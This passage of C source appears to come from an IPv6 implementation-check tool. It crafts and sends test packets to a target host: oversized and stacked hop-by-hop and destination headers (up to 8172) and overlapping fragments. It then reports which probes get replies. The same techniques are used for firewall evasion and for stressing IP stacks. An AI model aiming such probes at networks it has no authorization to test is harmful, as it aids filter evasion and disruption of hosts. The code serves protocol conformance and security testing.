4) != 0) { matched = -1; if (debug) printf("\nDEBUG: packet contents different\n"); if (epos == 0) return; } else { matched = 1; etype = ipv6hdr[40]; ecode = ipv6hdr[41]; } if (epos > 0 && epos < len && memcmp(ipv6hdr + epos + off, gpattern, 4) == 0) { matched = 1; etype = ipv6hdr[40]; ecode = ipv6hdr[41]; } if ((ipv6hdr[6] == gtype1 || gtype1 == 0) && (ipv6hdr[40] == gtype2 || gtype2 == 0) && (gpos <= 0 || (gpos < len && memcmp(ipv6hdr + gpos, gpattern, 4) == 0))) matched = 2; if (off == 8 && ((ipv6hdr[40] == gtype1 || gtype1 == 0) && (ipv6hdr[40+off] == gtype2 || gtype2 == 0) && (gpos <= 0 || (gpos < len && memcmp(ipv6hdr + gpos + off, gpattern, 4) == 0)))) matched = 2; if ((ipv6hdr[6] == gtype1a || gtype1a == 0) && (ipv6hdr[40] == gtype2a || gtype2a == 0) && (gpos <= 0 || (gpos + off < len && memcmp(ipv6hdr + gpos, gpattern, 4) == 0))) matched = 2; if (off == 8 && ((ipv6hdr[40] == gtype1a || gtype1a == 0) && (ipv6hdr[40+off] == gtype2a || gtype2a == 0) && (gpos <= 0 || (gpos + off < len && memcmp(ipv6hdr + gpos + off, gpattern, 4) == 0)))) matched = 2; if (debug) printf("\nDEBUG: hdr[6] %d|%d == %d, hdr[40] %d|%d == %d, pos[%d/%d] %02x%02x%02x%02x == %02x%02x%02x%02x\n", ipv6hdr[6], gtype1, gtype1a, ipv6hdr[40], gtype2, gtype2a, gpos, epos, gpos == 0 ? 0 : ipv6hdr[gpos], gpos == 0 ? 0 : ipv6hdr[gpos + 1], gpos == 0 ? 0 : ipv6hdr[gpos + 2], gpos == 0 ? 0 : ipv6hdr[gpos + 3], gpos == 0 ? 0 : gpattern[0], gpos == 0 ? 0 : gpattern[1], gpos == 0 ? 0 : gpattern[2], gpos == 0 ? 0 : gpattern[3]); return; } int check_for_reply(pcap_t *p, int type1, int type2, int type1a, int type2a, int pos, int pos2, unsigned char *pattern) { int ret = -1; time_t t; t = time(NULL); matched = 0; gtype1 = type1; gtype1a = type1a, gtype2 = type2; gtype2a = type2a, gpos = pos; epos = pos2; gpattern = pattern; while (ret < 0) { if (thc_pcap_check(p, (char *) check_packet, NULL) > 0) ret = 1; if (matched == -1) { ret = -1; matched = 0; } if (time(NULL) > t + 4 && ret < 0) ret = 0; } if (matched == 0) printf("FAILED - no reply\n"); if (matched == 1) { printf("FAILED - error reply [%d:%d]\n", etype, ecode); if (onecase == 0) sleep(2); } if (matched == 2) { printf("PASSED - we got a reply\n"); ret_code = 0; } usleep(500); return matched; } int check_alive(pcap_t * p, char *interface, unsigned char *src, unsigned char *dst) { int ret = -2; time_t t; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); thc_ping6(interface, src, dst, 16, 1); t = time(NULL); while (ret < 0) { if (thc_pcap_check(p, (char *) ignoreit, NULL) > 0) ret = 1; if (time(NULL) > t + 1 && ret == -2) { thc_ping6(interface, src, dst, 16, 1); ret = -1; } if (time(NULL) > t + 4 && ret < 0) ret = 0; } return ret > 0 ? 1 : 0; } int main(int argc, char *argv[]) { int test = 0, count = 1; unsigned char buf[1500], bla[1500], bigbla[65536], tests[256], string[64] = "ip6 and dst ", string2[64] = "ip6 and src "; unsigned char *dst6, *ldst6 = malloc(16), *src6 = NULL, *lsrc6, *mcast6; unsigned char *srcmac = NULL, *dstmac = NULL, *routers[2], null_buffer[6]; thc_ipv6_hdr *hdr; int i, j, k, srcmtu, fragsize, use_srcroute_type = -1, offset = 14; pcap_t *p; unsigned char *pkt = NULL, *pkt2 = NULL, *pkt3 = NULL; int pkt_len = 0, pkt_len2 = 0, pkt_len3 = 0, noping = 0; char *interface; setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stderr, NULL, _IONBF, 0); if (argc < 3 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); while ((i = getopt(argc, argv, "pds:")) >= 0) { switch (i) { case 'p': noping = 1; break; case 'd': debug = 1; break; case 's': src6 = thc_resolve6(optarg); break; default: fprintf(stderr, "Error: unknown option %c\n", i); exit(-1); } } interface = argv[optind]; dst6 = thc_resolve6(argv[optind + 1]); if (dst6 == NULL) { fprintf(stderr, "Error: can not resolve %s to a valid IPv6 address\n", argv[optind + 1]); exit(-1); } memcpy(ldst6, dst6, 16); memset(ldst6 + 2, 0, 6); ldst6[0] = 0xfe; ldst6[1] = 0x80; mcast6 = thc_resolve6("ff02::1"); if (argc >= optind + 3) { test = atoi(argv[optind + 2]); onecase = 1; } memset(buf, 0, sizeof(buf)); memset(null_buffer, 0, sizeof(null_buffer)); if (do_hdr_size) offset = do_hdr_size; if (src6 == NULL) src6 = thc_get_own_ipv6(interface, dst6, PREFER_GLOBAL); if (src6 != NULL && src6[0] == 0xfe) lsrc6 = src6; else lsrc6 = thc_get_own_ipv6(interface, ldst6, PREFER_LINK); if (lsrc6 == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } strcat(string, thc_ipv62notation(src6)); strcat(string2, thc_ipv62notation(dst6)); srcmac = thc_get_own_mac(interface); if ((dstmac = thc_get_mac(interface, src6, dst6)) == NULL) { fprintf(stderr, "ERROR: Can not resolve mac address for %s\n", argv[2]); exit(-1); } if ((srcmtu = thc_get_mtu(interface)) <= 0) { fprintf(stderr, "ERROR: can not get mtu from interface %s\n", interface); exit(-1); } fragsize = ((srcmtu - 62) / 8) * 8; if ((p = thc_pcap_init(interface, string)) == NULL) { fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string); exit(-1); } setvbuf(stdout, NULL, _IONBF, 0); memset(tests, 0, sizeof(tests)); printf("Performing implementation checks on %s via %s:\n", argv[optind + 1], argv[optind]); if (noping == 0) { if (check_alive(p, interface, src6, dst6) == 0) { fprintf(stderr, "Error: target %s is not alive via direct ping6!\n", argv[optind + 1]); exit(-1); } else printf("Test 0: normal ping6\t\t\t\tPASSED - we got a reply\n"); } /********************** TEST CASES ************************/ if (test == 0 || test == count) { printf("Test %2d: hop-by-hop ignore option\t\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); buf[0] = NXT_IGNORE; buf[1] = 0; if (thc_add_hdr_hopbyhop(pkt, &pkt_len, (unsigned char *) &buf, 6) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0); while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, 100, 0, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: hop-by-hop ignore option 2kb size\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(bigbla, 0, sizeof(bigbla)); bigbla[0] = NXT_IGNORE; bigbla[1] = 0; if (thc_add_hdr_hopbyhop(pkt, &pkt_len, (unsigned char *) &bigbla, 2046) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; hdr = (thc_ipv6_hdr *) pkt; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_send_as_fragment6(interface, src6, dst6, NXT_DST, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, hdr->pkt_len > fragsize ? fragsize : (((hdr->pkt_len - 40 - 14) / 16) + 1) * 8) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, 100, 0, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: 2 hop-by-hop headers\t\t\t", count); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(bla, count % 256, sizeof(bla)); memset(buf, 0, sizeof(buf)); buf[0] = NXT_IGNORE; buf[1] = 0; for (i = 0; i < 2; i++) if (thc_add_hdr_hopbyhop(pkt, &pkt_len, (unsigned char *) &buf, 6) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0); while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, 130, 0, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: 128 hop-by-hop headers\t\t\t", count); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(bla, count % 256, sizeof(bla)); memset(buf, 0, sizeof(buf)); buf[0] = NXT_IGNORE; buf[1] = 0; for (i = 0; i < 128; i++) if (thc_add_hdr_hopbyhop(pkt, &pkt_len, (unsigned char *) &buf, 6) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0); while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, 130, 1200, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: destination ignore option\t\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); buf[0] = NXT_IGNORE; buf[1] = 0; if (thc_add_hdr_dst(pkt, &pkt_len, (unsigned char *) &buf, 6) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0); while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, 100, 0, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: destination ignore option 2kb size\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(bigbla, 0, sizeof(bigbla)); bigbla[0] = NXT_IGNORE; bigbla[1] = 0; if (thc_add_hdr_dst(pkt, &pkt_len, (unsigned char *) &bigbla, 2046) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; hdr = (thc_ipv6_hdr *) pkt; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_send_as_fragment6(interface, src6, dst6, NXT_DST, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, hdr->pkt_len > fragsize ? fragsize : (((hdr->pkt_len - 40 - 14) / 16) + 1) * 8) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, 100, 0, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: 2 destination headers\t\t\t", count); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(bla, count % 256, sizeof(bla)); memset(buf, 0, sizeof(buf)); buf[0] = NXT_IGNORE; buf[1] = 0; for (i = 0; i < 2; i++) if (thc_add_hdr_dst(pkt, &pkt_len, (unsigned char *) &buf, 6) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0); while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, 130, 0, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: 128 destination headers\t\t", count); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(bla, count % 256, sizeof(bla)); memset(buf, 0, sizeof(buf)); buf[0] = NXT_IGNORE; buf[1] = 0; for (i = 0; i < 128; i++) if (thc_add_hdr_dst(pkt, &pkt_len, (unsigned char *) &buf, 6) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0); while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, 130, 1200, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: 2000 destination headers\t\t", count); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(bla, count % 256, sizeof(bla)); memset(buf, 0, sizeof(buf)); buf[0] = NXT_IGNORE; buf[1] = 0; for (i = 0; i < 2000; i++) if (thc_add_hdr_dst(pkt, &pkt_len, (unsigned char *) &buf, 6) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; hdr = (thc_ipv6_hdr *) pkt; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_send_as_fragment6(interface, src6, dst6, NXT_DST, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, hdr->pkt_len > fragsize ? fragsize : (((hdr->pkt_len - 40 - 14) / 16) + 1) * 8) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, 130, 1200, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: 8172 destination headers\t\t", count); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(bla, count % 256, sizeof(bla)); memset(buf, 0, sizeof(buf)); buf[0] = NXT_IGNORE; buf[1] = 0; for (i = 0; i < 8172; i++) if (thc_add_hdr_dst(pkt, &pkt_len, (unsigned char *) &buf, 6) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; hdr = (thc_ipv6_hdr *) pkt; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_send_as_fragment6(interface, src6, dst6, NXT_DST, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, hdr->pkt_len > fragsize ? fragsize : (((hdr->pkt_len - 40 - 14) / 16) + 1) * 8) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, 130, 1200, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: correct fragmentation\t\t\t", count); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(bla, count % 256, sizeof(bla)); thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, sizeof(bla), 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; hdr = (thc_ipv6_hdr *) pkt; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, hdr->pkt_len > fragsize ? fragsize : (((hdr->pkt_len - 40 - 14) / 16) + 1) * 8) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_FRAG, NXT_ICMP6, NXT_FRAG, NXT_ICMP6, fragsize - 100, 0, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: one-shot fragmentation\t\t\t", count); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_oneshotfragment(pkt, &pkt_len, getpid() + 70000) < 0) return -1; memset(bla, count % 256, sizeof(bla)); thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, fragsize - 100, 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; // hdr = (thc_ipv6_hdr *) pkt; // while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); // if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, // hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, hdr->pkt_len > fragsize ? fragsize : (((hdr->pkt_len - 40 - 14) / 16) + 1) * 8) < 0) // return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, fragsize - 200, 0, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: overlap-first-zero fragmentation\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); buf[0] = NXT_IGNORE; buf[1] = 0; if (thc_add_hdr_dst(pkt, &pkt_len, (unsigned char *) &buf, 6) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, srcmtu - 150, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_dst(pkt2, &pkt_len2, (unsigned char *) &buf, 6) < 0) return -1; thc_add_icmp6(pkt2, &pkt_len2, ICMP6_PINGREPLY, 0, count, (unsigned char *) &bla, srcmtu - 150, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) < 0) return -1; /* frag stuff */ hdr = (thc_ipv6_hdr *) pkt; i = ((hdr->pkt_len - 40 - offset - 10) / 8) * 8; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 0, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 1, count)) return -1; memcpy(buf, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset); while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_add_data6(pkt3, &pkt_len3, NXT_HDR, buf, hdr->pkt_len - 40 - offset - 22)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt2; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 0, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 0, count)) return -1; memcpy(buf, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset); if (thc_add_data6(pkt3, &pkt_len3, NXT_HDR, buf, hdr->pkt_len - 40 - offset - 22)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore pkt3 = thc_destroy_packet(pkt3); /* lets see if it worked */ pkt = thc_destroy_packet(pkt); pkt2 = thc_destroy_packet(pkt2); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, fragsize - 200, 0, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: overlap-last-zero fragmentation\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); buf[0] = NXT_IGNORE; buf[1] = 0; if (thc_add_hdr_dst(pkt, &pkt_len, (unsigned char *) &buf, 6) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, srcmtu - 150, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_dst(pkt2, &pkt_len2, (unsigned char *) &buf, 6) < 0) return -1; thc_add_icmp6(pkt2, &pkt_len2, ICMP6_PINGREPLY, 0, count, (unsigned char *) &bla, srcmtu - 150, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) < 0) return -1; /* frag stuff */ hdr = (thc_ipv6_hdr *) pkt2; i = ((hdr->pkt_len - 40 - offset - 10) / 8) * 8; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 0, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 1, count)) return -1; memcpy(buf, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset); if (thc_add_data6(pkt3, &pkt_len3, NXT_HDR, buf, hdr->pkt_len - 40 - offset - 22)) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 0, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 0, count)) return -1; memcpy(buf, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset); if (thc_add_data6(pkt3, &pkt_len3, NXT_HDR, buf, hdr->pkt_len - 40 - offset - 22)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore pkt3 = thc_destroy_packet(pkt3); /* lets see if it worked */ pkt = thc_destroy_packet(pkt); pkt2 = thc_destroy_packet(pkt2); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, fragsize - 200, 0, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: overlap-first-dst fragmentation\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); buf[0] = NXT_IGNORE; buf[1] = 0; if (thc_add_hdr_dst(pkt, &pkt_len, (unsigned char *) &buf, 6) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, srcmtu - 150, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_dst(pkt2, &pkt_len2, (unsigned char *) &buf, 6) < 0) return -1; thc_add_icmp6(pkt2, &pkt_len2, ICMP6_PINGREPLY, 0, count, (unsigned char *) &bla, srcmtu - 150, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) < 0) return -1; /* frag stuff */ hdr = (thc_ipv6_hdr *) pkt; i = ((hdr->pkt_len - 40 - offset - 10) / 8) * 8; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 0, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 1, count)) return -1; memcpy(buf, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset); if (thc_add_data6(pkt3, &pkt_len3, NXT_DST, buf, hdr->pkt_len - 40 - offset - 22)) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt2; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 0, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 1, 0, count)) return -1; memcpy(buf, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset); if (thc_add_data6(pkt3, &pkt_len3, NXT_DST, buf + 8, hdr->pkt_len - 40 - offset - 22)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore pkt3 = thc_destroy_packet(pkt3); /* lets see if it worked */ pkt = thc_destroy_packet(pkt); pkt2 = thc_destroy_packet(pkt2); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, fragsize - 200, 0, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: overlap-last-dst fragmentation\t\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); buf[0] = NXT_IGNORE; buf[1] = 0; if (thc_add_hdr_dst(pkt, &pkt_len, (unsigned char *) &buf, 6) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, srcmtu - 150, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_dst(pkt2, &pkt_len2, (unsigned char *) &buf, 6) < 0) return -1; thc_add_icmp6(pkt2, &pkt_len2, ICMP6_PINGREPLY, 0, count, (unsigned char *) &bla, srcmtu - 150, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) < 0) return -1; /* frag stuff */ hdr = (thc_ipv6_hdr *) pkt2; i = ((hdr->pkt_len - 40 - offset - 10) / 8) * 8; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 0, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 1, count)) return -1; memcpy(buf, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset); if (thc_add_data6(pkt3, &pkt_len3, NXT_DST, buf, hdr->pkt_len - 40 - offset - 22)) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 0, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 1, 0, count)) return -1; memcpy(buf, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset); if (thc_add_data6(pkt3, &pkt_len3, NXT_DST, buf + 8, hdr->pkt_len - 40 - offset - 22)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore pkt3 = thc_destroy_packet(pkt3); /* lets see if it worked */ pkt = thc_destroy_packet(pkt); pkt2 = thc_destroy_packet(pkt2); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, fragsize - 200, 0, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test 